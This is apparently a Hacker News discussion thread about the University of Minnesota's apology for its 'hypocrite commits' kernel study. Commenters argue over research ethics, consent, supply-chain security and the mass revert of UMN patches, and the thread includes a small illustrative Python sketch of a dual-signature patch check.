I've learned over several decades that any simple pronouncement that "X is ethical/unethical" is an effective way of ensuring that you will be wrong about some particular case. Yes, I think there might be cases where it is justified, but it would be very rare and require extremely careful monitoring and review. Two areas where it might come up would be medical research and research on children or adults of diminished capacity. In the former, there might be situations where the value of the research to the collective health and safety of the entire community would be sufficient to balance the use of such deception. In the latter, it may not be possible for your subjects to give informed consent (side note: this is, of course, also an ethical problem in experimentation on animals). The ethical dimensions of parents or guardians consenting to experimentation on their charges are extremely complex.

I will go out on a short limb and assert that ethical experimentation using that sort of deception depends a great deal on the details of a given case. Very subtle changes in the experimental protocol could easily change its ethical acceptability.

P.S: And, of course, there are a vast number of things that are completely legal but absolutely unethical.


Hopefully you see this: the department's response to the Linux Foundation[0] does not make sense no matter how I look at it, because deceit requires the investigator(s) to participate in the activities being observed[1].

[0] https://drive.google.com/file/d/1z3Nm2bfR4tH1nOGBpuOmLyoJVEi...

[1] https://www.law.cornell.edu/cfr/text/45/46.104#d_2_iii


Not pictured: any attempt to argue that experimenting on the team that reviews kernel patches is a legitimate thing to do. They discuss it as if they were researching something naturally occurring, like the animals living in a tidepool.

I can imagine research on a "process" made up of humans as having some value. For example, testing EMTs on whether they correctly diagnose injuries, or testing TAs on whether they catch exam cheating. But I would expect the researchers to ask someone (in those cases, maybe the manager of the EMTs or the TAs, in this case I suppose Linus) whether this research is wanted, and for guidance on how to go about it. For example they could submit the questionable patches during slow times. Does anyone know if that happened? I assume if it had, they would've mentioned it.

With that kind of permission, I wouldn't have a problem with this research and I don't think most people here would either. Without, this is the academic equivalent of those "just a prank, bro" youtube videos.


> As many observers have pointed out to us, we made a mistake by not finding a way to consult with the community and obtain permission before running this study; we did that because we knew we could not ask the maintainers of Linux for permission, or they would be on the lookout for the hypocrite patches.

This shows one thing to me clearly: they still don't understand how such studies are conducted. Unauthorized penetration testing is illegal, to a very large degree.

For example, as far as I understand, and as many have pointed out: you get permission from members for a study without specifying the time or any details of the study, then conduct the study six months later.


To summarize:

-they apologize for the three patches in 2020

-they claim asking permission would have defeated their research

-they claim the other 200 were legitimate patch attempts (a sample of which ranged, from my personal reading, from 'innocuous but useless' to 'slightly harmful').

Hard to believe, but plausible.


> they claim asking permission would have defeated their research

But surely this proves malice aforethought. If you interact with someone under false pretences to deliberately mislead them, then you are effectively lying to them. In fact, if you are doing so in order to receive something of value from them (such as their time reviewing your code) then it could even be seen as fraud.

Did they tell their IRB that their research involved deception? Before declaring the project exempt from oversight, the IRB should have required that the researchers answer a question like "Does your research involve interacting with people who are not aware of your project and who would act differently if they were aware?"

Until the IRB process at the university contains at least this level of protection against such ethical failings (not just in Computer Science research but across all areas of study) I think it is right for the kernel team to refuse to interact with members of that institution.


I would like see their research proposal to answer some of these questions. That probably won’t happen though.


If we don't somehow make it socially acceptable to let any security researchers conduct the required social engineering to test supply chain attack susceptibility of OSS maintainers without tipping them off in advance, dangerous state actors -will- continue to do it and -not- tell anyone when they are successful.

Punishing these researchers this harshly for bad manners creates a chilling effect that will scare researchers away from evaluating potentially one of the single biggest vulnerabilities in our industry.

To be honest, if anyone went around anonymously trying to merge security exploits across well-used open source supply chains, and always told everyone when they were successful immediately afterward and helped everyone become more vigilant in code review, I would call them a public servant even if they were almost universally hated for it.

I don't think most people realize just how easy supply chain attacks are and how widely they are being exploited by very dangerous organizations.

If something does not change fast to dramatically increase the level of scrutiny we give to code contributions, it is going to get much worse.

I have gone very far in pentests. Planting malicious USB cables, modifying keyboard firmware, straight up taking unlocked laptops and walking off, sniping recently expired domains to do XSS attacks, obtaining password reset links for the email accounts of maintainers of highly depended on third party dependencies.

Even with consent from high levels at orgs it still upsets unknowing people that are tricked at lower levels in the org. I don't apologize for this because it is my job.

I have seen real and successful social engineering attacks by state actors up close, and you would much prefer a security researcher with bad manners breaking you of your survivorship bias over being hit by the real thing.

The reality is big companies can afford to pay people like me. Open source projects by random solo maintainers that the security of almost everyone on the internet relies on... can't.

We should be very thankful for people that risk public rebuke to do research like this in open source at minimal cost to the receiving organization.


> If we don't somehow make it socially acceptable to let any security researchers conduct the required social engineering to test supply chain attack susceptibility of OSS maintainers without tipping them off in advance, dangerous state actors -will- continue to do it and -not- tell anyone when they are successful.

What's the result of that? Lots of known bad patches being sent in, wasting everyone's time, because now every researcher finds "do they spot my intentional bugs" as an easy way to get something published?

There's no reason why you can't run these studies with their consent. Ask the maintainers. "But it will tip them off", yeah, in a "they would be aware that somebody might send faulty code at some point in the future" kind of way, which they certainly already are. To get consent, you don't need to tell them exactly when you will be sending it, who will be sending it, or what exactly it would be.

If it did put them into permanent hyper-vigilance mode, then ... goal achieved?


This suggestion, taken to its logical conclusion, implies in my mind that I should send an email to every open source project maintainer ever, warning them that at some unknown future date I might attempt to validate their 2FA settings or try to submit mildly malicious code to test their ability to do code review.

Maybe this helps to raise awareness, even though in reality I will do tests like this to a tiiiiny percentage of repos over the next decade.

I don't really know what purpose this would serve other than making people realize everyone got the same message, and everyone going back to being just as complacent as they were... but now that we've technically informed them it was going to happen, it's fine?

Do any security researchers ask permission before finding other vulnerabilities in random open source code? I have never observed this.

I feel like this type of thing should be assumed to come from whitehats or blackhats always.

I for one teach everyone around me that if they can compromise me, they can have the bitcoin private key I leave on my personal systems. They earned it, and I will see that outgoing transfer on that address as a canary.

I have been compromised a couple of times in this game when multiple people colluded, and it only leveled up my opsec and threat model. Good.

IMO we should double down and raise grants to offer as bug bounties for people that successfully get potentially malicious code past code review in majorly depended on open source projects. We need to encourage a -lot- of this behavior to train people.


> Do any security researchers ask permission before finding other vulnerabilities in random open source code? I have never observed this.

That's not what happened. Nobody is asking (or is expected to ask) when they look for vulnerabilities. The researchers were trying to introduce vulnerabilities. Had they only looked at the tools that maintainers use and given those a good shake to see whether an attack vector is lurking there, everybody would have been happy.

> IMO we should double down and raise grants to offer as bug bounties for people that successfully get potentially malicious code past code review in majorly depended on open source projects.

The likely consequence of that would be maintainers shutting down public contributions because nobody has time to deal with automated submissions from scripts that are bounty hunting.


Trying to submit a vulnerability they had no intention of actually allowing to ship to the public is not that different from finding serious vulnerabilities with no intention of using them.

There also might be middle ground where people submit benign code that clearly demonstrates highly risky behavior the reviewer should have noticed.

Maybe I introduce code that covertly exfiltrates memory from a non-sensitive address, but does so in a way that makes it clear I could have chosen a more sensitive one. Or code that simply executes a ping to my server, etc.

Anyway, the point is, intent matters.


> Trying to submit a vulnerability they had no intention of actually allowing to ship to the public is not that different from finding serious vulnerabilities with no intention of using them.

It is different in that looking for vulnerabilities in code only costs you time, trying to introduce vulnerabilities costs the other person's time as well, and often producing vulnerabilities scales much better, e.g. you could write some tool that mails them patches, while they'd have to individually judge the merits.

> There also might be middle ground where people submit benign code that clearly demonstrates highly risky behavior the reviewer should have noticed.

I don't think so. The issue isn't so much with trying to get code reviewed, it's with wasting people's time. That they did so by trying to introduce bugs is just the icing on the cake.

If you get consent, you can have all your tests and strengthen the infrastructure, without eventually breaking the system because every other "researcher" submits bogus code every day in hopes of having one slip through so they can write a paper on how they proved that project X is exploitable.

I've noticed the same with general bounties. When you have a security.txt or are on hackerone etc, you'll get lots of useless automated submissions that are wasting your time. Once that happens, you'll either shut down the program, or start rejecting reports automatically which includes the possibility of a false positive.


> even though in reality I will do tests like this to a tiiiiny percentage of repos over the next decade

So...contrary to what you suggest in your first paragraph, all you need to do is send out a handful of warning emails at the appropriate juncture. What’s the problem? For sure you shouldn’t be submitting malicious code to a project without forewarning. That's just a basic ethical no-no. Even if you were right that this kind of unethical research somehow had beneficial results, the ends wouldn't justify the means.


Well, that basic ethical no-no is going to make it impractical for anyone to do open source supply chain integrity evaluation at scale, because getting permission from thousands of people to do sweeping tests is impractical, and it warns everyone for a short period, making the scenario inauthentic.

It will make it hard for things to improve, so millions will continue to get hacked due to supply chain attacks that almost no one is doing anything about.

At what point does the ethical fault of negligence become so great that intervening to stop said negligence without consent becomes justified? We don't have much in the way of well defined law in this area yet, and it may take a long time to catch up.

I suggest the lesser evil in the short term is to allow maintainers to suffer occasional mild embarrassment from time to time because they merged bad code. They get a valuable lesson out of the deal with no one getting hurt, no privacy violated, etc.

If maintainers don't want to review code with the understanding that it could be malicious, then they have the right to never review or merge anything.

All code contributions should be considered potentially malicious.

Now, we also don't want to see repos bombarded with bad commits either if we can help it.

Maybe a middle ground could exist where open source authors can signal a willingness to be tested once a year, and can signal if a test for this year has happened already.

I think most projects would not do this, but it might be a step towards wide consent long term if someone cares to build such a system.

In the decades before that though, there are not really any good options.

If someone's house is on fire and it has the potential to burn the neighborhood down, I don't imagine you should be faulted for doing what is required to put it out.

Emergencies sometimes warrant dispensing with niceties. I think the supply chain attack risk is approaching emergency levels at this point. Negligence is the norm.


>Well that basic ethical no-no is going to make it impractical for anyone to do [x]

There's tons of potentially useful research that's impractical because of ethical considerations. Just think of all the incredibly useful medical research that could be done in the absence of ethical constraints!

In the end that's just tough cookies. If you can't do your research ethically then you can't do it. Period.

If you really want to help the Linux kernel, offer your time as a patch reviewer. That would achieve far more than any attempt to deceive and embarrass others with pointless "research". (I say that it's pointless because the results are antecedently obvious – of course you can deceive reviewers if you spend enough time and effort on it.)

In your ethical world, it seems that people who offer their spare time to review kernel patches are "negligent", while people who do nothing but carp from the sidelines are heroes. In my view, the situation is exactly the opposite.


FWIW I completely agree with you but I see no way out.

The Linux kernel project needs and deserves the best security methods, but (a) it likely can't afford the people, and (b) bringing more money aboard might draw unmotivated people who are only after the paycheck, which could objectively deteriorate the project's code quality.

Dual cryptographic sign-off still doesn't address any social issues (or I'm grossly misunderstanding it if it does). For example, a state actor can threaten or bribe two, five, or thirty people into merging a harmful patch.

So what can actually be done?


Most projects have virtually no accountability at all.

Hundreds of people have blind push access to brew. Almost no one signs code. One bad commit and you backdoor every company in Silicon Valley that blindly executes the unsigned code from the brew repo. Pick a favorite Linux distro. All but a handful work the same way.

Right now a low-skill malicious party just needs to phish one of the ~90% of maintainers who don't have strong (or any) 2FA enabled anywhere in a dependency graph, while they are on vacation or not paying attention to a project, and sneak a commit or two into history while notifications are turned off. Attacks just like this have happened in the wild and gone unnoticed for months. How many have we still not noticed?

It is insane we let it get to this point. I feel like we are in early 1900s medicine where only like 1/10000 doctors see the value in washing hands and tools.

Dual cryptographic signatures on all code from author/maintainer plus signatures by security-only reviewers from a pool not known in advance before new releases would be a very high bar for an adversary to defeat and a high risk of exposure.
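The dual sign-off idea can be sketched as a simple policy check. This is a minimal, hypothetical illustration under my own assumptions (it is not the `sig` tool's actual design); HMAC with per-reviewer shared keys stands in for real asymmetric signatures (OpenPGP, minisign, etc.) just to keep the sketch runnable:

```python
# Hypothetical dual sign-off policy: accept a patch only if at least
# `threshold` *distinct* trusted identities have produced valid detached
# signatures over the patch bytes. HMAC-SHA256 is a stand-in for real
# asymmetric signature verification.
import hashlib
import hmac

# Hypothetical trusted signer -> verification key registry.
TRUSTED_KEYS = {
    "author": b"author-key",
    "maintainer": b"maintainer-key",
    "security-reviewer": b"reviewer-key",
}

def sign(patch: bytes, signer: str) -> bytes:
    """Produce a detached 'signature' for a trusted signer (stand-in)."""
    return hmac.new(TRUSTED_KEYS[signer], patch, hashlib.sha256).digest()

def accept(patch: bytes, signatures: dict, threshold: int = 2) -> bool:
    """Accept only if >= threshold distinct trusted signers verify."""
    valid = {
        who for who, sig in signatures.items()
        if who in TRUSTED_KEYS
        and hmac.compare_digest(sig, sign(patch, who))
    }
    return len(valid) >= threshold

patch = b"fix: check return value of allocation"
sigs = {"author": sign(patch, "author"),
        "maintainer": sign(patch, "maintainer")}
print(accept(patch, sigs))                        # two distinct signers -> True
print(accept(patch, {"author": sigs["author"]}))  # one signer -> False
```

The key property is that a single compromised or coerced identity cannot get code accepted on its own; an attacker has to defeat multiple independent keyholders, ideally ones not known in advance.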

I have helped deploy variations of this approach with clients/employers in the past, and will publish more detailed recommendations along these lines publicly soon.

If the remaining weaknesses in this threat model and posture became our worst attack surface, we would be in dramatically better shape.


I agree it's insane but this is what the market optimizes for.

I pushed for more security and better practices until I was fired from three companies. It's quite obvious that business only cares about PR; if a big security incident happens, they are more interested in reducing liability than in preventing the problem the next time around.

Until programmers become an elite clique with a huge barrier to entry and our own independent income -- completely disconnected from the interests of those who want to use our services -- then we have our hands tied and are at the mercy of the paycheck and its innate conflicts of interest with good craftsmanship.


I know this struggle well. Survivorship bias is an epidemic. It is one of the reasons I started my own security consulting firm.

I feel I am happier and have a wider net impact now that I can choose to invest less time with clients that can't afford to be super interested in security right now and invest more time in those that are.

Weirdly companies seem to listen to security consultants more than their own internal full time security advocates.


Off-topic but got interested in what you do and how and if you are happy with the financial results (I gathered you are satisfied with your work already). Would you mind an email message?


Sure. Hit me up any time :)


What's your suggestions on how oss maintainers can fend off state actor attacks? Always need two people to sign off on a patch?

I strongly agree that supply chain attack is a huge deal and worse attacks will come to light eventually but what should be done at the level of oss maintainers?

Like you said, I feel like Open source projects by random solo maintainers that the security of almost everyone on the internet relies on... can't do a lot of things.


Dual cryptographic sign off is exactly what I recommend and have been prototyping tools to make this easier: https://github.com/distrust-foundation/sig


This is a textbook non-apology and is just further reason to keep this researcher (and whoever else was involved) banned from ever contributing again.


Wasn’t it the case that in their last exchange with the maintainer (that email that caused all the stir) they were accused of submitting patches that did nothing at all and wasting time in doing so? In this letter they claim these patches were real fixes.

Having got their university banned and undone the effort that went into 190 previous patches from others, which have now been reverted, it seems likely to me that they are under internal pressure. In all, it makes me doubt the sincerity of any of this, especially given the tone of the last email exchange with the maintainer. A lot of sudden learning seems to have taken place between then and now.


Is this post actually research for an upcoming paper on apologizing to the open source community?


"We are sorry, but we are going ahead and presenting our paper at IEEE"?

Since when is it OK to acquire data through unethical means and then publish it in a journal?


> We just want you to know that we would never intentionally hurt the Linux kernel community and never introduce security vulnerabilities. Our work was conducted with the best of intentions and is all about finding and fixing security vulnerabilities.

Uhh.. but that was the exact intent of the paper. And they did it successfully. So.. mission failed successfully?

What a bizarre attempt to save face. This is academic misconduct and they're trying to save their asses.


Obviously the intent was never to introduce security vulnerabilities, no matter how naive and badly thought-out their methodology was. The intent was to show it could be done. None of the proposed vulnerabilities ever got in the kernel, whenever they were at risk of being accepted, the maintainer was warned and the process was aborted.


Not from what I read. They mentioned there were multiple commits on the stable branch.


Yes, but those are among all the previous commits from anyone with a University of Minnesota address that Mr. Kroah-Hartman ripped out; some going back over a decade, others five or six years. AFAICT those were from totally unrelated people, many of whom may not even be there any more, and who had nothing to do with this project. If there are bugs in those, then I think we must conclude that those are "genuine" inadvertent bugs. Unless we were to assume there have been similar research projects there before... which were never publicised anywhere at all and remain secret to this day? That wouldn't be a research project but genuine black-hat activity. But AFAICS there's no more logical reason to suspect former UMinn contributors of that than any other former contributors.


Coincidentally, Software Freedom Conservancy recently published an article about how to apologise in a sincere way:

https://sfconservancy.org/blog/2021/apr/20/how-to-apologize/


People here don’t seem to be convinced. There’s a good amount of defense in this letter, so I get it, and it could have been framed better, but ultimately it seems like they learned a valuable lesson and have value to add, so why not let people learn from mistakes and move on? They’ve already been publicly shamed…


Reading this thread I am saddened to see hn apparently conform to the law of maximum offence. We see the least charitable explanation for everything said in the apology because outrage gets upvotes.


there's "assume good faith", and then there's "assume good faith of someone with a documented record of bad faith." The present case is the second. Assuming good faith in this apology is not sensible in the face of the existing evidence. Their goal seems to have been to generate a paper, and they haven't withdrawn that paper.


I agree. This is what I would expect from twitter. I would have hoped HN could manage to be better.


Huge "I'm sorry I got caught" vibe. And it still refers to this malicious annoying behavior as "work" or "research", lmao


I mean, there’s all kinds of terrible unethical research.

What makes you think this isn’t research?


Their paper got accepted to S&P 2021. That is the top conference in computer security in case one is not aware.

Not justifying what they did but this apparently is still research.


This paint on canvas got sold and therefore it is Art.


What is that supposed to mean? Conference publications are for research.

I pulled this from the website of Oakland 2021

> Since 1980 in Oakland, the IEEE Symposium on Security and Privacy has been the premier forum for computer security research, presenting the latest developments and bringing together researchers and practitioners. We solicit previously unpublished papers offering novel research contributions in any aspect of security or privacy. Papers may present advances in the theory, design, implementation, analysis, verification, or empirical evaluation and measurement of secure systems.

https://www.ieee-security.org/TC/SP2021/cfpapers.html


You’re defining whether something is “research” not based upon what it is or what it contains, but just based upon whether or not it’s been published.

I was pointing out that this is like defining whether or not something is “art” not based upon the work itself, but instead based solely upon whether somebody bought it.

Incidentally, my recipe for apple pie was printed in a newspaper, and so therefore my recipe is “news”.


> We sincerely apologize for any harm our research group did to the Linux kernel community.

This doesn't admit to harm done, and sounds like an apology that doesn't admit guilt.


A BS non-apology is not enough. These assholes should at the very least be reprimanded by the University of Minnesota for unethical research practices (psychological experiments on humans without their consent) and for bringing the whole institution into disrepute.


The reputational damage to the department is staggering.


Past related threads:

“They introduce kernel bugs on purpose” - https://news.ycombinator.com/item?id=26887670 - April 2021 (1902 comments)

UMN CS&E Statement on Linux Kernel Research - https://news.ycombinator.com/item?id=26895510 - April 2021 (313 comments)

Others?


I find it false.

There were months of opportunity for contrition.

They seemed a little too proud of their paper for Oakland'21, and this note comes much too late, for the message to be sincere.


The overwhelming majority of the HN comments seem critical of a party who... wrote and shipped code intended specifically to exploit the trust/naivete of others, to the others' detriment, for the offending party's career gain.

And which party then -- to add insult to injury -- didn't seem to appreciate the offense, when called on it.

IMHO, to examine this incident very seriously is appropriate and beneficial. If we ease up on the casting stones, and look at the problem a bit more generally, some of the lessons learned might hit close to home.


The tone is not really apologetic, with the passive, detached, past-tense phrasing. It's as if they are avoiding fully owning up to the fact that their methods, their choices, and their actions were unethical.

> we are very sorry that the method used in the “hypocrite commits” paper was inappropriate.


First, they released their apology on a Saturday? The Friday / Saturday release is generally a bit shady to start with.

The single mention of the IRB and lack of apology for doing human behavior research without permission of the test subjects is still problematic. I suppose being involved with an industry that does A/B testing on users might be an excuse.

Also, "any harm" should be "the harm" in a sincere apology.


Maybe the apology letter is also research. Best not to give these idiots the benefit of the doubt now.


> we believe we have much to contribute in the future

Please, you've contributed enough already, really.


Yeah. Please find another project, that doesn't involve deliberately breaking other people's work, and screwing up the kernel that a billion people rely on.

If that means changing jobs, most of us have been there. Looking for a job sucks, but if you screw up that badly, then you do have to consider stacking shelves in a supermarket; you're not fit to work on a public project of such importance.


Yep, we've had a taste of your contribution. Hope there's no more of it.


Only "sorry" because you got yourselves banned.


I agree with this post

> Unless the researchers are lying (which I've not seen a clear indication of), the 190 patches you have selected here are nothing more than collateral damage while you are completely missing the supposed patch submission addresses from which the malicious patches were sent! This all really sounds like a knee-jerk reaction to their posting. I have to say, I think it's the wrong reaction to have.

https://lore.kernel.org/lkml/18edc472a95f1d4efe3ef40cc9b8d26...

Greg Kroah-Hartman’s poorly thought out bulk reversion is the bigger waste of time here.


The researchers already lied when they conducted the study. What you are proposing is that we now should trust them to tell us the extent of their previous duplicitousness.

The most recent patch, which triggered the ban, has not been explained in good faith, and it seems likely there were mistruths involved in that exchange as well.

So while it is absolutely a waste of time to have to go back through those 190 commits, the responsibility for that falls squarely on the researchers who broke that trust, not on Greg for refusing to re-extend that trust in the face of continued sketchy behavior.


Why shouldn’t we trust them on the extent of their lies? Except for the three research commits, everything they have said has been true.

Given how few of the 190 have turned out to be wrong, given the timeline of the research relative to the patches, and given the existing static analysis papers: did Aditya Pakki write two entire papers about static analysis as cover for continuing this hypocrite-commit research? Or did Aditya Pakki submit a bad patch in good faith, and Greg Kroah-Hartman misunderstood and then overreacted with this mass revert? I think the latter is more plausible.

Otherwise, why stop at 190? The hypocrite commits came from Gmail. Logically, if we can’t trust the researchers, we need to revert all Gmail commits. Wait, they could be infiltrating other universities; we should ban university commits everywhere. That would be a lot of work. So Greg picked a medium-sized set of patches that expressed his power and outrage but had no real effect. The point is that the particular set of commits he chose aren’t risky (by inspection we know they are good) and aren’t related to the hypocrite commits. So many innocent people are having their work thrown away because Greg is angry.

Note that we have only seen the simple-to-revert patches. There are 68 complex UMN patches that have not been reverted. I expect they won’t be, because this is mainly theater. The commits are good, but Greg wants to show how angry he is.

My impression is we are just living through some kernel maintainer lashing out because he was embarrassed by the failed review process and mixed up the buggy static commits with the hypocrite research. Admitting you’re wrong is hard, so I don’t expect Greg to do that.


Let's flip this on its head and posit a counterfactual. Let's say that Greg does nothing and re-extends trust. Then vulnerabilities are exploited that exist due to additional bad patches submitted by this researcher. Greg would rightly be held to account for failing to do his due diligence when he had clear evidence of malicious commits.

So even if all the the commits are good and even if Greg believes that, he has still been forced into these actions by the violations of trust committed by the researchers.

You are correct that the line as to which patches get reverted is a bit arbitrary, but it was always going to be. The research was conducted by the university, so that seems the most reasonable place to draw the line to me.

I have still yet to see any explanation from the researchers as to why that "bad patch" happened, didn't include a reference to the automated tool as required, or what tool it even was.

I do think Greg is angry, but I don't think your insistence on ascribing Greg's anger as his primary motivation is fair to him or consistent with HN guidelines on comments. I think you could make points about reverting commits without what seem to me like unnecessary personal attacks.


If someone, or in this case a set of affiliated someones, have proven to do malicious or ethically questionable things, trust has to be earned. The risk of letting things stay without extensive verification is not worth it and I definitely don't consider this a kneejerk reaction given the potential perception risks.


Hypocrite patches came from Gmail.

Banned umn mail.

Because that’s going to reduce risk?


It’s not so much that they banned UMN email as that they banned the University of Minnesota.

This particular act is about avoiding the risk of researchers wasting kernel developers time.

As evidenced by the response, it seems really unlikely that other institutions will think it’s a good idea to perform experiments on the kernel devs in the future.


Most of the reverted commits are fine by inspection, and the researchers insist there were only 3 hypocrite submissions, which didn’t get merged.

So the idea is to collectively punish the mostly innocent people who wrote the 190 good commits, spending a huge amount of developer time checking them or losing the fixes, in order to deter other institutions from doing this?

Does reverting nearly 200 good patches seem out of proportion relative to 3 unmerged hypocrite commits?


That’s a fair question about proportionality.

I don’t have any special insight into the kernel team, but I think the response is as much about making an example of the university as it is about removing any plausibly contaminated commits, in which case it makes sense to be somewhat extreme.

Others are saying the entire research team should be fired.

It’s interesting that the former (reverting the commits) is something the kernel devs can do to punish the university, while the latter (firing researchers) is something the university can do to punish the researchers.

Who messed up? The researchers, or the university that approved their research?

Probably enough blame to go around.


Proportionality is one aspect.

Punishing the right people is another.

If you’re an UMN patch submitter who has just seen your work thrown away because of the actions of some researchers you don’t know and some kernel maintainer you don’t know, you’d be rightly upset.

Punishing the entire university for the actions of a few is a bad idea: https://en.m.wikipedia.org/wiki/Collective_punishment


FWIW, I can find no patches committed since 2013 that are not by people who are or were in the relevant lab at UMN [1].

Maybe my research is flawed, but I don't think the bulk revert is currently hitting anyone but them.

[1] - https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux...
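
That kind of authorship check can be sketched with a short script. The sample log lines below are invented stand-ins for real `git log --format='%ae|%s'` output from the kernel tree:

```python
# Group commits by author-email domain to see whose work a bulk revert
# would hit. The sample entries are hypothetical, not real kernel history.
from collections import defaultdict

def commits_by_domain(log_lines):
    """Map author-email domain -> list of commit subjects."""
    by_domain = defaultdict(list)
    for line in log_lines:
        email, subject = line.split("|", 1)
        domain = email.split("@", 1)[1].lower()
        by_domain[domain].append(subject)
    return dict(by_domain)

sample = [  # hypothetical stand-ins for `git log --format='%ae|%s'` output
    "student@umn.edu|ALSA: usx2y fix a double free bug",
    "dev@kernel.example|net: fix refcount leak",
    "prof@umn.edu|tty: clean up error path",
]
hits = commits_by_domain(sample)
print(hits.get("umn.edu"))  # the commits a umn.edu-wide revert would touch
```

In practice you would feed it the real log and then eyeball whether the affected authors all belong to the lab in question.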


It’s a good observation.

So, for example, we have a 2019 commit by Wenwen Wang being reverted. Wenwen is now at UGA. The commit is “ALSA: usx2y fix a double free bug”; review by Takashi Iwai confirms it’s a good fix. I don’t agree with Greg K-H threatening to trash Wenwen’s work and his reputation, and to add bugs to the Linux kernel, out of spite toward researchers that Wenwen hasn’t worked with in years.

Note that Aditya Pakki denies being a part of the hypocrite commits on email, maintains his denial in the apology, and has written papers on static analysis.

Also, the vast majority of those commits are being re-reviewed and found good.

Greg Kroah-Hartman accused him of intentionally submitting bad commits. That accusation appears false. Greg should apologize to Wenwen and Aditya.

This is a broad brush. It’s hitting a bunch of good commits, and we know the 3 hypocrite commits aren’t among them.


The complaints, depending on who you were listening to, were that the patches were superfluous (cf. [1], where Aditya apparently later claimed "The patch is garbage") or contained security flaws (cf. [2] for one such allegation), whether deliberate or accidental, and that too many of them had been accepted without enough review by dint of being "trivial fixes". (One claim, for example, was "I took a look on 4 accepted patches from Aditya and 3 of them added various severity security "holes"." [3], which, if false, should probably provoke an apology.)

Assuming [3] came from a reasonably trustworthy source after Greg's initial distrust and frustration, combined with Aditya's reply of being extremely offended that anyone would doubt his work (which, if we assume for a moment he wasn't aware of the researchers' prior work poisoning LKML's opinion of the lab, could be a reasonable reaction), it's not surprising that Greg's conclusion was "rip out all the patches for now and re-review them as we have time".

People keep overlooking that the plan was never "permanently remove the patches", it was always "remove the patches for now and then re-review them all".

And now it's working as expected - people are re-reviewing the patches proposed for removal and going "hey this is fine", "hey this is harmless", or occasionally, probably "hey this is bad". (I have not read anywhere near all the replies to the thread, I'm just assuming that the people who were complaining about the patches were also operating in good faith and not just making up complaints.)

I don't really see another reasonable way to have acted, if you suspect a group of people has been generating poor patches and getting them committed, whether out of malice or ignorance, than removing them for now and re-reviewing them.

If it turns out that the patches were (probably, since I don't think there's any absolute confidence to be had here) merely bad and not malicious, then sure, an apology would be warranted for claiming malice where there was none. (And for those who don't think he ever claimed malice, like I did when I started writing this reply, see [4], specifically 'Commits from @umn.edu addresses have been found to be submitted in "bad faith" to try to test the kernel community's ability to review "known malicious" changes.')

But I don't think "okay we need to re-review all these patches (and the usual thing to do if we need to re-review patches is remove them for now)" warrants an apology in itself.

[1] - https://github.com/torvalds/linux/commit/799bac5512188522213...

[2] - https://lore.kernel.org/linux-nfs/YIAta3cRl8mk%2FRkH@unreal/

[3] - https://lore.kernel.org/linux-nfs/YH+zwQgBBGUJdiVK@unreal/

[4] - https://lore.kernel.org/lkml/20210421130105.1226686-1-gregkh...


Great detailed specific reply.

In the end, we largely agree.

It is exactly the accusation of malice when what occurred was normal error that deserves an apology. You teased that out well.

As you note, we don’t have certainty. But we observe:

Aditya is not an author on the hypocrite commits paper.

Aditya withdrew his “garbage” commit when made aware it was not correct.

Aditya is author of other papers on static analysis.

Aditya’s other commits have generally survived this bulk review. Leon Romanovsky has offered no follow-up for his claim of security holes, nor explained his claim that the commits are part of the hypocrite-commits research.

Aditya maintains his claims even as other members of UMN have explained their role in the hypocrite commits.

Aditya’s commits come from a UMN address, whereas the hypocrite commits came from Gmail.

These observations make it overwhelmingly likely that Aditya’s commits are from a good-faith, somewhat buggy static analysis effort.

This poor guy has worked for years on the Linux kernel, and Greg Kroah-Hartman’s thoughtless rush to judgement threatened all that effort. Greg should apologize. Leon Romanovsky should too.

They mixed up a couple of things and got carried away by their emotions. It happens. They should work to undo the damage.


> Aditya withdrew his “garbage” commit when made aware it was not correct.

It seems like he withdrew it in response to stumbling over [2], wherein Al Viro points out that the correct thing to do with buggy commits is to request they be reverted. (Based on, among other things, the fact that said LWN post is cited in the revert.)

> Leon Romanovksy has offered no follow up for his claim of security holes nor explained his claim that the commits are part of the hypocrite commits research.

He did offer the patch I cited as "[2]" in my prior reply, as well as pointing out [1] the commit where they reworked the buggy logic from it.

One commit does not a sinner make, but it's not correct to say he offered no data.

> They mixed up and couple things and got carried away by their emotions.

I'm not the biggest fan of GregKH for other reasons [3], but other than maybe explicitly requiring and verifying a list of broken commits beforehand, I'm not sure what I would have wanted him to do differently. If you have prior reason to suspect a group of behaving maliciously, and someone you trust attests that they appear to have behaved maliciously, what do you do differently? "I promise I'm not part of that research" doesn't work if you think the group might lie, and as I've pointed out other times, the only ones caught in the temporary patch removal were members of the relevant lab, and I further claim that "patches temporarily removed for re-examining" is not that severe a punishment.

[1] - https://lore.kernel.org/linux-nfs/YIMDCNx4q6esHTYt@unreal/

[2] - https://lwn.net/Articles/854319/

[3] - https://marc.info/?l=linux-kernel&m=154714516832389


> He did offer the patch I cited

Fair point. Not sure what became of the other alleged security holes.

> "I promise I'm not part of that research"

This is a gross oversimplification of the evidence that Aditya is not malicious.

I offered a lot of evidence above that Aditya is likely not malicious, just clumsy.

The LWN post you pointed to reaches the same conclusion: “I am quite certain by now that patches had been crap in good faith; the odds of that being the penetration testing, take 2, are IMO very low.”

So it’s possible that Greg wrongly judged Aditya based on trusting Leon or other bad reasoning. Fine.

Now it’s abundantly clear that Aditya was not making malicious commits, and Greg should apologize to him for the false accusation.


I think we're agreeing loudly.

I agree with you that Aditya is probably not malicious, just clumsy, to be clear. But I feel like it's probably reasonable for someone in GregKH's position to have a higher threshold to clear than "probably" once the question is posed.

I also wasn't trying to claim that "I promise I'm not part of that research" encompassed all the evidence, just remark that personal attestation of innocence would not have been a useful input at that juncture.

I'm not sure, however, at what point an apology is merited now. Anything significantly less than re-reviewing 100% of someone's patches seems like a poor choice given the small absolute number of bad patches that were used in that paper; and we're choosing by pseudorandom sample, which is biased by how active/familiar the maintainers are with different parts of the code... etc.

So I don't know what the right confidence level should be for concluding a prior judgment of "you might be malicious" was wrong. (Maybe enumerating+examining all the "malicious" commits remarked upon by Leon, since that's what sparked the fire?)


You do know that one can contribute without having to use their institutional email address?


Yes, I do know that.

The policy is not about them being physically prevented from emailing from not-a-umn-researcher@yahoo.com.

It’s a symbolic policy, but I would be extremely surprised if a university flouted a clear and explicit ban on their participation.


I was reading this thread... https://lore.kernel.org/lkml/20210421130105.1226686-1-gregkh...

The Linux kernel team had to revert changes in over 200 files. They will also have to go back and review hundreds of commits to make sure they do not contain any malicious code.

The technical effort in addition to all the time spent dealing with the backlash of this is a waste of time for a lot of people doing important work that benefits everyone.

So, what else can be said... Play stupid games, win stupid prizes. To Mr. Lu, Wu, and Pakki: enjoy your ban and worldwide press coverage.


> The Linux kernel team had to revert changes in over 200 files.

